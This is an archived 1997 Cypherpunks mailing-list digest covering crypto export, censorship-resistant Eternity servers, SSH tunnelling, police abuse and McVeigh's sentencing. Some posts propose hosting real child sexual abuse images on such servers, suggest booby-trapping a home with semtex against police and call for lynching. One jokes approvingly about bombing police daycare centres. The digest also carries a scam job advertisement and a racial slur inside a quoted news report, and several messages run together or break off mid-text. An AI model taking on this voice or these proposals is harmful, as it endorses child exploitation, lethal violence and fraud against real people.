From enoch at zipcon.net  Wed Aug 13 21:09:38 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Thu, 14 Aug 1997 12:09:38 +0800
Subject: Child Porn and Eternity  (Re: "Leotards and the Law...
In-Reply-To: 
Message-ID: <19970814040114.10431.qmail@zipcon.net>



Tim May writes:

> Such images (including non-morphed images of real nude children, or even of
> children engaging in sex, and so on) are, by the way, good candidates for
> Eternity servers. If the Eternity operators freak out and ban such images,
> so much for "Eternity." Perhaps they could then be named "Ephemeral"
> servers.

Hmmm.  Aren't such images all over Usenet already?  I think people manage
to find them without Eternity servers delivering them via a handy "point
and click" interface.

I think Eternity server administrators should take a pledge not to censor
content, and simply take servers down if an unacceptable amount of heat is
applied.  Perhaps we need "Eternity Server In A Box", and of course
"Eternity for Windoze '95/NT." 

For now, with only five operating servers, we need to concentrate on
otherwise homeless free speech, and not spend time replicating the Dregs
of Usenet in a new and interesting format. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}

 






From dlv at bwalk.dm.com  Wed Aug 13 21:51:27 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Aug 1997 12:51:27 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: 



Ray Arachelian  writes:

> On Wed, 13 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > What if a non-US person paid them $40 to spam people outside the U.S.
> > with strong crypto?
> >
> > Is it possible to stuff a blatant ITAR violation into about 100 lines of as
>
> Already been done.  RSA in 4 lines of Perl, etc...  Heck there was even a

I mean a useable package.

> site out that that cut a UUENCODED copy of PGP into many bits and asked
> people to grab one of the bits to use as their signature.  I.e. Part 50
> out of N of PGP, etc...  Someone with huge usenet archives (or cd's) could
> search for all of these outside of the USA and put them together into the

Yes, but how practical is it?

> whole. :)  No need to pay someone $40 to spam when people will freely do
> this.

Stanford Wallace gives out free autoresponders.

> You could also take a packet radio modem and spam short wave (or
> whatever packet radio uses or can use that can get outside the usa) and
> send PGP that way if you like.  Or take PGP, uuencode it and fax it
> outside of the USA.  Or feed it through a voice synth and read it to
> a foreign phone number that has a voice decoder, or compose it as a
> MIDI song as Kent suggested and broadcast the song...  Or tatoo it on your
> ass then when you visit russia have someone take a picture. :)  (Though
> you might then be arrested in russia for porno or whatever the laws are
> there, heheheheh....)

Unsilenced use of crypto.

However the point is to get Cyberpromo to export crypto in violation of
ITAR without annoying people with spam.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From whgiii at amaranth.com  Wed Aug 13 21:55:27 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Thu, 14 Aug 1997 12:55:27 +0800
Subject: Hypothetical situation for networks
In-Reply-To: 
Message-ID: <199708140445.XAA07502@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/13/97

   at 09:39 PM, Mike Jones  said:

>This is a 100% hypothetical situation, though would be interesting to see
>if it is possible.

>A company does some R&D work, which it wishes to keep classified from
>competitors.

>However, they have two main offices on opposite sides of the country.

>Not wishing to use sneakernet type file transfer, they wish to pass
>confidential material from one network to the other using the Internet.

>Now we all know that anyone with a little bit of knowledge can intercept
>the packets as they go past and read the information.

>Email is out, as they do use a system of file mirroring, keeping each set
>of data as a backup as well as for usage.

>Would make sense for them to use a type of NFS system, but is there an
>implimentation of secure (ie: encrypted) NFS available?

>OS doesn't really matter, as it is a hypothetical system, but we'll
>assume either some form of unix/linux, or perhaps winNT or novell
>NetWare.

>Thanks in advance for the info and knowledge...sorry if it's been asked
>before.

Redirect all your socket connections through ssh. That way all your
communications between the two offices will be encrypted.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBM/J/T49Co1n+aLhhAQFRLQQAm8iDbnsS1Rp//LiskXr/B9e5O7EcqSvt
MRBotK9KeHET8qGDqexzt/U5OPH+gDVO3qAp5RZ/gl6LSRTTZON/gBheOeaVJIcl
QqbDPshblGpibaxa9zUNADii6tlSwhp2qwV8hXuUsMZcYHOWu5CSzs3aVzbV2pDq
+uAC20JyQpg=
=XSLK
-----END PGP SIGNATURE-----






From azur at netcom.com  Wed Aug 13 21:58:17 1997
From: azur at netcom.com (Steve Schear)
Date: Thu, 14 Aug 1997 12:58:17 +0800
Subject: "Leotards and the Law," morphed child porn lawsuit, from Netly
In-Reply-To: 
Message-ID: 



At 12:05 PM -0700 8/13/97, Mike Duvos wrote:
>Said laws of course being
>absolutely necessary to prevent bad ideas from being used by clever
>predators to break down innocence and purity and reduce all children to
>sexually aroused putty in the hands of professional sex criminals.

Are any sex criminals professional, that is get paid?  If so, where do I
apply ;-)

>
>I wonder exactly how far child sex hysteria will be permitted to continue,
>before rational people begin giggling loudly in the auditorium.

One need only look to the Salem witch trials for the answer.

--Steve







From 84714498 at 01996.com  Thu Aug 14 15:03:00 1997
From: 84714498 at 01996.com (84714498 at 01996.com)
Date: Thu, 14 Aug 1997 15:03:00 -0700 (PDT)
Subject: $450 weekly gauranteed.
Message-ID: <1227687>




$450 a week guaranteed job!

If you want to make $450 a week from home, you can.

HUD needs people to process mortgage refunds with them.

I will send you the complete information for $5, sent with your
Email address and postal address to:


4630 N.W. Grand suite 59-A
Glendale, AZ 85301









From Michael.Johnson at mejl.com  Thu Aug 14 00:39:27 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Thu, 14 Aug 1997 15:39:27 +0800
Subject: Fuck the usenet cabal
In-Reply-To: 
Message-ID: <3.0.3.32.19970814092117.0097c820@localhost>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dr.Dimitri Vulis KOTM wrote:
>However the point is to get Cyberpromo to export crypto in violation of
>ITAR without annoying people with spam.

Why? All crypto has already been exported. If you're trying to get
Spamford in trouble by blowing the whistle on him for EAR violations, it
won't work. He'll just claim that he wasn't aware of the crypto export
and then he'll shut down that auto responder. It is not illegal to
export crypto unknowingly.

Spend your free time on debugging PGP5 instead.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBM/K93cUc8bdD9cnfEQLzZQCg9WqtS0Enu1Pff+E8I0YzLbGQCxkAn3j0
SU+xwU5CGufp/kgzs5earrpC
=T1Mj
-----END PGP SIGNATURE-----


Mike.






From aba at dcs.ex.ac.uk  Thu Aug 14 05:08:59 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 14 Aug 1997 20:08:59 +0800
Subject: PGP in < 100 lines of perl (was Re: Fuck the usenet cabal)
In-Reply-To: 
Message-ID: <199708140730.IAA00648@server.test.net>




Dimitri Vulis  writes:
> > > Is it possible to stuff a blatant ITAR violation into about 100
> > > lines 
> >
> > Already been done.  RSA in 4 lines of Perl, etc...  
> 
> I mean a useable package.

I once started trying to implement full PGP functionality in as few
lines of perl/dc as possible.

I got pgp signature verification working.
and PGP compatible IDEA PRZ style CFB mode in 9 lines.  
and PGP key lookup in 7 lines.
and MD5 in 8 lines.

(Several of those were other peoples contributions)

If you used /dev/random for random numbers plus a bit more glue, it
would've worked.  Everything put compression and key generation.

There was a perl competition for the most interesting program in under
2000 characters of perl.  I ran out of enthousiasm, patience before
completing.

With a whole 100 lines to play with you could probably do key gen and
compression too.  (I wondered if you could shell gzip or zip and some
hacking to get PGP zip functionality, as it is just ripped off zip
code).

Makes you wonder what PRZ did wrong with pgp 2.x, what did he use to
pad it out to 34,881 lines?

PGP 5.0 is fearsomely large, and I'm sure you could do the rest too in
a few more 10s of lines (already got an SHA1, DSS is more twiddling in
dc, already got DES in 21 lines, no CAST but that wouldn't be too
hard).

If anyone is interested naturally I can share the current code.  The
perl 2000 char competition probably is once a year or something.

Any takers?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



There's a provocative list of forbidden CIA and NSA/CSS 
records which are not available under the Privacy Act, and 
which constitute a sort of negative awaiting development:

   http://jya.com/cia-privacy.htm  (82 categories)

  http://jya.com/nsa-privacy.htm  (19 categories)

There are similar lists of national privacy proscriptives for 
most federal agencies available at the source for these. The
one for Defense is an elephantine 1.4 MB, with tiny tims for
the TLAs.







From dlv at bwalk.dm.com  Thu Aug 14 06:43:07 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 14 Aug 1997 21:43:07 +0800
Subject: Hypothetical situation for networks
In-Reply-To: 
Message-ID: <63eFBe4w165w@bwalk.dm.com>



Mike Jones  writes:

> A company does some R&D work, which it wishes to keep classified from
> competitors.
...
> Not wishing to use sneakernet type file transfer, they wish to pass
> confidential material from one network to the other using the Internet.

They should not be using the Internet not (only) because of security
considerations, but because of performance/reliability/availability
considerations.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From sunder at brainlink.com  Thu Aug 14 08:06:23 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 23:06:23 +0800
Subject: Memme: Crypto=Bullet Proof Vests (fwd)
In-Reply-To: <199708140252.VAA27127@einstein.ssz.com>
Message-ID: 



On Wed, 13 Aug 1997, Jim Choate wrote:

> How did the police get special 'rights' that normal citizens don't?
> Especialy considering that they are mentioned no place in the Constitution.
> And the Constitution specificaly prohibits via the 10th such self-invoked
> expansion of powers.

There are other devices that can only be bought by LEA's but those are
usually surveilance gear.  The SpyKing seminar told us that there are "GPS
recorders" that can be planted in a mark's car, which will record all the
coordinates ever second, where the mark was, so by planting this nice
device and retrieving it, you get a lovely map without having to trail the
guy.

There's another version which you don't have to retrieve that allows you
to drive next to the mark's car then have the data beamed back to you!

Since it isn't a bug and doesn't transmit anything (until triggered), it's
very hard to detect in your car.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Thu Aug 14 08:17:10 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 23:17:10 +0800
Subject: Sign up on YoungSluts click thru Program
In-Reply-To: <199708140251.WAA12029@columbia.ctlnet.com>
Message-ID: 




would you guys quit giving cypherpunks at toad.com as your email address for
your porno runs.  The extra spam is annoying. :)  use nobody at nowhere.mil
if you want... :)


On Wed, 13 Aug 1997, YoungGirl wrote:

> sorry to bother you but did you want to sign up on the click thru program if 
> you did as you see below we did not get any info if your browser cant send 
> forms just e-mail the information and we will get you up and running tonite 
> 
> 
> Thank you
> 
> 
> 
> At 07:46 PM 8/13/97 -0700, you wrote:
> >Below is the result of your feedback form.  It was submitted by
> > (cypherpunks at toad.com) on Wednesday, August 13, 1997 at 19:46:18
> >---------------------------------------------------------------------------
> >
> >site_name: http://
> >
> >first_name: cypherpunks
> >
> >last_name: cypherpunks
> >
> >mode: add
> >
> >---------------------------------------------------------------------------
> >
> >
> 
> 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Thu Aug 14 08:36:16 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 23:36:16 +0800
Subject: Memme: Crypto=Bullet Proof Vests
In-Reply-To: 
Message-ID: 



On Wed, 13 Aug 1997, Tim May wrote:

> 
> Careful with this argument!

Okay, so let's modify it to be domestic then and say "only cops can buy
body armor" etc... instead.
 
> Better be careful with this analogy. In fact, armor of various sorts is
> clearly a defense item, and is often on the list of restricted items. For
> example, Chobham and reactive tank armor was strictly controlled.

> Personally, I think Cypherpunks should concentrate on making crypto
> ubiquitous in the United States, and monkeywrench "by any means available"
> any plans to restrict in any way the use of strong crypto within the U.S.

Welp, using such arguements whenever possible, whenver the media and the
kongress will list will help monkeywrench domestic anti-crypto
legislation, or GAK only legislation.  This is still a valuable tool to
use in addition to making it ubuquitous. :)

Here's another project: if we can get enough $$$ to burn thousands of CD's
burned with Crypto on them and then get Software ETC and Egghead, and Rat
Shack and others to give them away as freebies the way that they give away
Netcomm and Prodigy and AOL CD's, we could reach quite a few folks.

I've done some of this a few years back at various PC and other Expos on
floppies, but getting Win95 and Mac versions of PGP wrappers and stuff to
fit on a floppy isn't feasable. :)

What would be cool is if we could ship an EudoraLite with a freeeware PGP
built (or some such), a crypto IRC client, an anonymous remailer client
(like the mixmaster java applet) and other such "internet access tools" on
this CD and tout it as Secure Internet access tools or some such. :) 

And if we can get a bunch of ISP's to allow us to use their client
software, say Netcom and such (not that I want to give them money) it
could be pretty useful for Joe Sixpack "I wanna get on the 'net thing" 

> By the way, there are already laws in place limiting "cop killer bullets,"
> and some restrictions are already in place for limiting body armor (the
> preferred name for "bullet proof vests").
> 
> "For law enforcement use only" is the label used.

> So I'd be careful with all of these munitions and armor analogies. The
> First Amendment arguments are much stronger and less ambiguous.

True, but when they scream "save the children" we can use the above and
show that our own government forbids us to "save the kids" from bullets by
making wearing of body armor forbidden.   We can then say crypto=body
armor and take it from there possibly getting both released.  (That and
three quarters will buy you a cup of coffe, but we have to try.)

The arguement can be raised, why can't normal citizen units purchase
bullet proof vests?  If this isn't a clear cut hint that we've been living
in a police state, what is?  Cops sodomizing black men on the street with
toilet plungers and beating the shit out of them?  Gun laws? :)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Thu Aug 14 08:46:22 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 23:46:22 +0800
Subject: CIA/NSA Index
In-Reply-To: <1.5.4.32.19970814123122.0067fca0@pop.pipeline.com>
Message-ID: 



On Thu, 14 Aug 1997, John Young wrote:

> There's a provocative list of forbidden CIA and NSA/CSS 
> records which are not available under the Privacy Act, and 
> which constitute a sort of negative awaiting development:
> 
>    http://jya.com/cia-privacy.htm  (82 categories)
> 
>   http://jya.com/nsa-privacy.htm  (19 categories)

I hope you mirrored those text files, 'cause the links on gpo.gov that
you're pointing to show nothing on my browser.  (could be the network here
is effed, but, check these sites again...)

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From sunder at brainlink.com  Thu Aug 14 08:50:54 1997
From: sunder at brainlink.com (Ray Arachelian)
Date: Thu, 14 Aug 1997 23:50:54 +0800
Subject: Hypothetical situation for networks
In-Reply-To: 
Message-ID: 



On Wed, 13 Aug 1997, Mike Jones wrote:

> Would make sense for them to use a type of NFS system, but is there an
> implimentation of secure (ie: encrypted) NFS available?
> 
> OS doesn't really matter, as it is a hypothetical system, but we'll assume
> either some form of unix/linux, or perhaps winNT or novell NetWare.

Can NFS under solaris or linux be tunneled through SSH?  That would seem
feasable (that is if you can get SSH to tunnel a UDP...)   If not, you
could use microsoft's PPTP, but I wouldn't trust its cyphers.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder at sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================






From aba at dcs.ex.ac.uk  Thu Aug 14 10:21:56 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Fri, 15 Aug 1997 01:21:56 +0800
Subject: lynch child pornographers not bits! (was Re: Child Porn and Eternity)
In-Reply-To: 
Message-ID: <199708141639.RAA03883@server.test.net>




Tim May  writes:
> At 8:08 AM -0700 8/13/97, Declan McCullagh wrote:
> 
> >        But Conti skirted the more controversial question: What if
> >   someone did use Photoshop to synthesize images of half-naked children?
> 
> Let me assure you that such images are available. I might be tempted to say
> I know exactly where to find them, and may have even taken a look at them
> ("as part of my campaign to determine the extend of child porn" :-} ), but
> in this climate that might get me a couple of SWAT vans roaring up my
> hillside...and then I'd have to make some quick decisions about shooting or
> going peacably.

Yup.  Btw have you thought about booby trapping your place with enough
semtex to remove half the hill-top?  Somewhat like Raven in Snow Crash
-- detonator for fusion device in his 'bikes side car was linked to
his brain waves ceasing unexpectedly.  Police were running around
trying to protect him.  The age of personal nukes, heh.  I guess the
danger is that it detonates by accident.

> Such images (including non-morphed images of real nude children, or even of
> children engaging in sex, and so on) are, by the way, good candidates for
> Eternity servers. If the Eternity operators freak out and ban such images,
> so much for "Eternity." Perhaps they could then be named "Ephemeral"
> servers.

I suspect child porn would be kind of the ultimate test :-)

Let's hope we can defer that argument for a few months until there are
more servers.  It'll be interesting to see how well the argument that
it's just a USENET gateway holds out.  Also interesting to see how
well operators can stick to the principle of unconditional free speech
when faced with some "speech" which makes them puke.

The NSA hand book, mykotronix dumpster goodies or more secret
materials probably aren't that sensitive in that once they're leaked
there's not so much point attempting to control their distribution.
Anyone who matters will already have a copy, and making a fuss about
re-distribution probably increases the interest, and number of people
who will read the material.

If eternity lives up to it's name child porn could be published.

Personally my feeling about child molestors, and real life child
pornographers is lynch them.

Child pornographers and pedophiles operate in the real world, and they
get caught.  Problem is they let them go again despite 80+% re-offense
rate.  Hence cry for "lynch them".  There was some sicko in this town
who molested a 7 year old girl over a 2 year time span.  Turned
himself in, and got 1 year jail time.  He's out an about cocky as
ever, not even repentant.  Back in the days of the wild-west such
types wouldn't live long.  "He needed killing" used to be I understand
a perfectly satisfactory legal defense.

btw "Child pornographer" is a difficult term to define towards the
boundary, eg Tracy Lords was underage at the begining of here career,
also the age of consent is much lower in the liberal Scandinavian
countries.  Last time we had this argument James Donald posted to the
list a uuencoded gif of some chick, I guess the claim was she was just
underage by US standards.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0



The remailer hating Nazi called Patrick Oonk wrote:
>At least I don't hide behind a remailer.

There's no cowardice to it, dumbass.  Our founding fathers and others wrote things anonymously.  I guess they're cowards?

If so, then burn in hell, Nazi scum-sucking weasel!






From nobody at REPLAY.COM  Thu Aug 14 10:37:32 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 15 Aug 1997 01:37:32 +0800
Subject: Sign up on YoungSluts click thru Program
In-Reply-To: <199708140251.WAA12029@columbia.ctlnet.com>
Message-ID: <199708141729.TAA28066@basement.replay.com>



Ray Arachelian  wrote:

> would you guys quit giving cypherpunks at toad.com as your email address for
> your porno runs.  The extra spam is annoying. :)  use nobody at nowhere.mil
> if you want... :)


I like to use alt.anonymous.messages@(mail2news.gateway)  Seems appropriate
for the newsgroup. :)

I've found a few sites that won't accept such a long email address tho.
I remember awhile ago someone was running a message-pool mailing list,
is it still around?






From declan at well.com  Thu Aug 14 10:42:00 1997
From: declan at well.com (Declan McCullagh)
Date: Fri, 15 Aug 1997 01:42:00 +0800
Subject: McVeigh to die, quotes Brandeis
Message-ID: 




/cat:A/pri:U/sld:A/por:1/for:5/slu:PM-MCVEIGH 2ndLd-Writethru -----
@TEXT
	PM-McVeigh, 2nd Ld-Writethru, a0621-624-626-535,0777

URGENT

McVeigh sentenced to death; quotes Brandeis about teaching by example

AP Photos staffing

By SANDY SHORE

Associated Press Writer

DENVER (AP) - Timothy McVeigh was formally sentenced to death today for the Oklahoma City bombing after he quoted Supreme Court Justice Louis Brandeis that the government "teaches the whole people by its example." McVeigh, wearing tan khaki slacks and tan shirt, was animated as he awaited the arrival of U.S. District Judge Richard Matsch, but turned grim after the death sentence was handed down. He spoke briefly before Matsch formally imposed the jury-sanctioned verdict. McVeigh quoted from a dissenting opinion written by Brandeis in 1928 in a wiretapping case, Olmstead vs. United States. McVeigh said: "He wrote, "Our government is the potent, the omnipresent teacher. For good or for ill, it teaches the whole people by its example.' That's all I have, Your Honor." McVeigh made his brief statement, which may have been a slap at the government that prosecuted him, in rapid-fire, clipped tones. He did not plead for his life or admit to any role in the bombing. Victims in the courtroom sat stone-faced and some stared angrily as McVeigh made his comments. Outside the courthouse, prosecutor Joseph Hartzler warned reporters, "Don't interpret his words as those of a spokesman or a statesman." McVeigh's lawyer, Stephen Jones, said, "today is a solemn day of judgment to follow through on the jury's verdict." He said he filed a notice of appeal this morning. [...] From ghio at temp0110.myriad.ml.org Thu Aug 14 10:48:43 1997 From: ghio at temp0110.myriad.ml.org (Matthew Ghio) Date: Fri, 15 Aug 1997 01:48:43 +0800 Subject: Hypothetical situation for networks In-Reply-To: Message-ID: <199708141738.KAA08443@myriad.alias.net> Ray Arachelian wrote: > Can NFS under solaris or linux be tunneled through SSH? That would seem > feasable (that is if you can get SSH to tunnel a UDP...) Yes, you can tunnel SLIP/PPP thru SSH. (Works on Linux, don't know about solaris.) From declan at pathfinder.com Thu Aug 14 10:58:09 1997 From: declan at pathfinder.com (Declan McCullagh) Date: Fri, 15 Aug 1997 01:58:09 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly Message-ID: By TOM HAYS

Associated Press Writer

NEW YORK (AP) - A police officer turned himself over to investigators after being accused of using a toilet plunger to sodomize a Haitian immigrant who was arrested in a scuffle outside a nightclub. Justin Volpe, 25, one of two officers that Abner Louima identified as his attackers, surrendered to the police department's internal affairs division Wednesday night. Louima was critically injured in the Saturday beating. Deputy Inspector Michael Collins said Volpe would be charged with aggravated sexual abuse and first-degree assault. Collins also said disorderly conduct charges against Louima were being dropped. And the mayor said the precinct was undergoing a staff shakeup. Citing an unidentified high-ranking official familiar with the investigation, the Daily News reported today that Louima told investigators Volpe sodomized him. Louima has said an officer shoved a toilet plunger into his rectum, and then into his mouth. "They said, "Take this, nigger,' and stuck the stick in my rear end," Louima, 30, said in a hospital interview. [...] From sunder at brainlink.com Thu Aug 14 11:49:00 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 15 Aug 1997 02:49:00 +0800 Subject: McVeigh to die, quotes Brandeis In-Reply-To: Message-ID: On Thu, 14 Aug 1997, Declan McCullagh wrote: > McVeigh quoted from a dissenting opinion written by Brandeis in > 1928 in a wiretapping case, Olmstead vs. United States. McVeigh said: "He > wrote, "Our government is the potent, the omnipresent teacher. For good or > for ill, it teaches the whole people by its example.' That's all I have, > Your Honor." Lemmeguess, Waco was the example? :) =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From enoch at zipcon.net Thu Aug 14 12:30:10 1997 From: enoch at zipcon.net (Mike Duvos) Date: Fri, 15 Aug 1997 03:30:10 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly In-Reply-To: Message-ID: <19970814191950.8410.qmail@zipcon.net> > Louima has said an officer shoved a toilet plunger into his > rectum, and then into his mouth. > "They said, "Take this, nigger,' and stuck the stick in my rear > end," Louima, 30, said in a hospital interview. Gee, where's Tim McVeigh when you really need him? I wonder if they have daycare centers at police headquarters. Broken eggs, etc... -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From sunder at brainlink.com Thu Aug 14 13:00:55 1997 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 15 Aug 1997 04:00:55 +0800 Subject: Toilet plungers and sodomy: Why we should trust police blindly In-Reply-To: <19970814191950.8410.qmail@zipcon.net> Message-ID: On Thu, 14 Aug 1997, Mike Duvos wrote: > Gee, where's Tim McVeigh when you really need him? I wonder if they > have daycare centers at police headquarters. > > Broken eggs, etc... This is really Guiliani's fault for hiring so many damn cops. NYC now has so many cops that if you walk down the street in most neighborhoods for more than 5 minutes you'll see at least one cop car. In their rush to hire cops, they also hired scum as cops. Who knows how many such incidents go unreported or are covered up. :( Damned police state if I ever saw one. As for stopping crime, they ain't doing shit. They're picking on small things like parking tix and such, but as for going after mobsters and drug dealers, the piggies are snarfing donuts. All I've ever see them do is ticket cars and tow them away. =====================================Kaos=Keraunos=Kybernetos============== .+.^.+.| Ray Arachelian |Prying open my 3rd eye. So good to see |./|\. ..\|/..|sunder at sundernet.com|you once again. I thought you were |/\|/\ <--*-->| ------------------ |hiding, and you thought that I had run |\/|\/ ../|\..| "A toast to Odin, |away chasing the tail of dogma. I opened|.\|/. .+.v.+.|God of screwdrivers"|my eye and there we were.... |..... ======================= http://www.sundernet.com ========================== From declan at well.com Thu Aug 14 13:01:00 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 15 Aug 1997 04:01:00 +0800 Subject: Clinton on mandatory voluntary gun locks Message-ID: AM-Clinton-Gun Locks,160

Clinton applauds gunmaker for safety locks

WASHINGTON (AP) - President Clinton belatedly applauded Smith & Wesson Thursday for the handgun manufacturer's decision to begin outfitting all its pistols with safety trigger locks. In a written statement, the president called the move "an important and responsible step for children's safety" and said he hoped it would encourage the Congress to require safety locks on all guns sold. "Child safety locks are the right thing to do," Clinton said. Smith & Wesson, the country's largest gunmaker, announced Monday that all of their handguns would be equipped with a two-piece, keyed lock starting next month. Clinton has pushed legislation requiring such locks with all gun purchases, but House and Senate committees rejected the provision when they put together their anti-crime legislation earlier this year. The Senate bill must still be voted on by the full chamber when it returns from the August recess. APTV-08-14-97 1544EDT From declan at well.com Thu Aug 14 13:06:43 1997 From: declan at well.com (Declan McCullagh) Date: Fri, 15 Aug 1997 04:06:43 +0800 Subject: Text of Clinton's remarks on child safety locks for handguns Message-ID: STATEMENT BY THE PRESIDENT This week, Smith and Wesson -- the world's largest manufacturer of handguns -- announced that it is forging a partnership with the Master Lock Company to provide a child safety lock with every handgun sold for commercial use. I applaud both of these companies for their efforts to promote gun safety. I particularly want to commend Smith and Wesson for taking an important and responsible step for children's safety. Child safety locks are the right thing to do. In 1994, 185 children were killed by accidental gunshot wounds. That is why my anti-gang and youth violence legislation would require that all federally licensed gun dealers provide such safety devices with every handgun sold. And that is why on March 3rd I ordered all federal agencies to provide child safety locks with the thousands of handguns they issue to federal law enforcement officers. Child safety locks have garnered the wide support of law enforcement, the medical community, many local governments, and now a part of the firearms manufacturing industry. This fall the full Senate considers the anti-juvenile crime legislation. I hope they will include the child safety lock as part of the legislation. -0- From frissell at panix.com Thu Aug 14 13:07:30 1997 From: frissell at panix.com (Duncan Frissell) Date: Fri, 15 Aug 1997 04:07:30 +0800 Subject: Tim McVeigh's Quote In-Reply-To: <1.5.4.32.19970814123122.0067fca0@pop.pipeline.com> Message-ID: <3.0.2.32.19970814154205.0364e39c@panix.com> -----BEGIN PGP SIGNED MESSAGE----- The mentally challenged in the audience couldn't figure out what McVeigh was saying with his Brandeis quote at the sentencing hearing. I think we can probably figure it out. It is from Brandeis' dissent in OLMSTEAD v. U.S., 277 U.S. 438 (1928) one of the first *wiretapping* cases. Here is the whole of the concluding paragraph with the quoted portion in square brackets: http://www.findlaw.com/cgi-bin/getcase.pl?court=US&vol=277&invol=438 "Decency, security, and liberty alike demand that government officials shall be subjected to the same rules of conduct that are commands to the citizen. In a government of laws, existence of the government will be imperiled if it fails to observe the law scrupulously. [Our government is the potent, the omnipresent teacher. For good or for ill, it teaches the whole people by its example.] Crime is contagious. If the government becomes a lawbreaker, it breeds contempt for law; it invites every man to become a law unto himself; it invites anarchy. To declare that in the administration of the criminal law the end justifies the means-to declare that the government may commit crimes in order to secure the conviction of a private criminal-would bring terrible retribution. Against that pernicious doctrine this court should resolutely set its face." DCF -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv 